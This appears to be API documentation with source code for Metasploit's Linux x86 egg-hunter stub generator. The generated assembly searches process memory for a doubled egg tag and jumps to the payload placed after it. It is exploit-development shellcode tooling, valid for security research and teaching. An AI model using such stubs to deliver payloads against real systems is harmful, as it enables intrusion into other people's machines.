Module: Rex::Exploitation::Egghunter::Linux::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary collapse
- Alias =
ARCH_X86
Instance Method Summary collapse
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
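# File 'lib/rex/exploitation/egghunter.rb', line 112

# The egg hunter stub for linux/x86.
#
# Emits a small assembly routine that walks memory a page at a time: each
# candidate address is probed with the `sigaction` syscall (0x43) and, when
# the kernel answers EFAULT (`al == 0xf2`), the low 12 bits are saturated so
# the next `inc ecx` lands on the following page. Readable memory is compared
# against the 4-byte egg tag; the tag must match twice back to back before
# control is transferred to the bytes that follow it (`jmp edi`).
#
# @param payload [String] payload that will follow the egg; in this method it
#   is only forwarded to checksum_stub
# @param badchars [String] bytes to avoid; only forwarded to checksum_stub
#   here -- the assembly emitted by this method is not itself filtered against
#   badchars (whether checksum_stub or the caller does so is not visible here)
# @param opts [Hash] stub options
# @option opts [String] :eggtag the 4-byte egg tag (required)
# @option opts [String] :startreg register whose value seeds the search
#   address; copied into ecx unless it already is ecx
# @return [String] the assembled stub bytes
# @raise [RuntimeError] if :eggtag is missing or not exactly 4 bytes long
def hunter_stub(payload, badchars = '', opts = {})
  startreg = opts[:startreg]

  # A missing :eggtag used to surface as NoMethodError on nil; coerce it so the
  # intended error is raised instead (nil.to_s has length 0).
  eggtag = opts[:eggtag].to_s
  raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if eggtag.length != 4

  # Little-endian dword of the tag, rendered as an immediate for `mov eax,...`.
  marker = "0x%x" % eggtag.unpack('V').first
  checksum = checksum_stub(payload, badchars, opts)

  # Optional preamble that seeds ecx from :startreg and skips the first probe.
  # Built as a fresh string (no in-place <<) so it also works under
  # frozen string literals; the trailing "\n\t" keeps the heredoc aligned.
  startstub =
    if !startreg
      ''
    elsif startreg.downcase == 'ecx'
      "\n\tjmp next_addr\n\t"
    else
      "\n\tmov ecx,#{startreg}\n\tjmp next_addr\n\t"
    end

  assembly = <<EOS
	cld
	#{startstub}
check_readable:
	or cx,0xfff
next_addr:
	inc ecx
	push 0x43	; use 'sigaction' syscall
	pop eax
	int 0x80
	cmp al,0xf2
	je check_readable
check_for_tag:
	; check that the tag matches once
	mov eax,#{marker}
	mov edi,ecx
	scasd
	jne next_addr
	; it must match a second time too
	scasd
	jne next_addr

	; check the checksum if the feature is enabled
	#{checksum}

	; jump to the payload
	jmp edi
EOS

  assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

  # return the stub
  assembled_code
end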